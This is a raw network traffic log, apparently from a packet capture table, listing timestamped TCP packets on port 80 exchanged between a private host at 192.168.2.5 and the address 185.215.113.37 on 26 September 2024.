Sep 26, 2024 21:14:15.786006927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786020994 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786047935 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786659956 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786670923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786680937 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786691904 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786701918 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786711931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786715984 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786721945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786731005 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786740065 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786751032 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786751986 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786762953 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786773920 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786780119 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786786079 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786796093 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786798954 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786807060 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786818027 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786827087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786837101 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786839008 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786849976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786856890 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786859989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.786870956 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786892891 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.786911011 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787585974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787597895 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787606955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787617922 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787627935 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787637949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787646055 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787647963 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787666082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787676096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787681103 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787686110 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787697077 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787707090 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787707090 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787717104 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787720919 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787733078 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787743092 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787743092 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787753105 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787756920 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787765026 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787775040 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787781954 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787786007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787794113 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787797928 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.787823915 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.787847042 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788516045 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788527966 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788537979 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788547993 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788558960 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788568974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788569927 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788578987 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788589954 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788595915 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788600922 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788610935 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788613081 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788625002 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788635015 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788640976 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788645983 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788656950 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788661957 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788670063 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788680077 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788682938 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788690090 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788701057 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788702011 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788712025 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.788724899 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.788748980 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789450884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789467096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789478064 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789489031 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789495945 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789504051 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789515018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789516926 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789525032 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789536953 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789546967 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789550066 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789556980 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789566994 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789570093 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789577961 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789588928 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789588928 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789598942 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789609909 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789619923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789623976 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789629936 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789640903 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789644957 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789650917 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789659977 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789663076 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.789690018 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.789712906 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790348053 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790359020 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790369034 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790379047 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790390015 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790400028 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790405035 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790409088 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790419102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790421963 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790432930 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790436029 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790445089 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790451050 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790456057 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790467024 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790474892 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790482044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790493965 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790502071 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790504932 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790515900 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790523052 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790527105 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790538073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790546894 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790549040 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790558100 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790568113 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.790576935 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790596008 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.790606022 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791323900 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791336060 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791343927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791353941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791363955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791374922 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791407108 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791412115 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791423082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791433096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791443110 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791451931 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791452885 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791464090 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791474104 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791475058 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791484118 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791502953 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791517973 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791699886 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791712046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791722059 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791732073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791739941 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791740894 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791752100 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791760921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791762114 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791773081 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791783094 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791794062 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791846037 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791846037 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791846037 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791846037 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791865110 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791876078 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791883945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791893959 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791904926 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791908026 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791914940 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791925907 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791928053 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791935921 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791940928 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791946888 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791958094 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791968107 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791977882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791984081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791986942 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.791994095 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.791997910 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792009115 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792017937 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792018890 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792030096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792043924 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792054892 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792068958 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792764902 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792777061 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792787075 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792797089 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792805910 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792809010 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792817116 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792821884 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792836905 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792846918 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792853117 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792857885 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792869091 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792870045 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792881012 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792891979 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792900085 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792901039 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792912960 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792922974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792927027 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792933941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792943954 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792946100 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792953968 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792965889 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792969942 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.792984009 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792994022 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.792995930 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793004036 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793014050 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793015957 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793024063 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793035030 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793045044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793045044 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793056011 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793075085 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793092966 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793761015 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793771982 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793781996 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793792009 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793801069 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793806076 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793812990 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793824911 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793834925 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793847084 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793858051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793858051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793865919 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793874025 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793878078 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793889046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793899059 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793903112 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793910027 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793920040 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793927908 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793931007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793939114 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793942928 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793955088 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793966055 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793968916 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793977022 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793987036 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.793993950 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.793998003 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.794007063 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.794013023 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.794035912 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.794044971 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.794749022 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.794759989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.794770002 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.794780016 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.794789076 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.794796944 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.794800997 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.794820070 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.794842958 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.815454006 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815475941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815486908 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815551996 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.815570116 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815582037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815593004 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815603971 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815618038 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.815638065 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.815835953 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815854073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815865993 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815875053 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815881014 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.815886021 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815897942 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815907955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815916061 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.815922022 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.815946102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.815960884 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.816415071 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.816497087 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.816498041 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.816544056 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.816627979 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.816638947 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.816652060 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.816660881 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.816669941 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.816673994 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.816687107 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.816716909 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:15.816749096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:15.816761017 CEST	80	49705	185.215.113.37	192.168.2.5
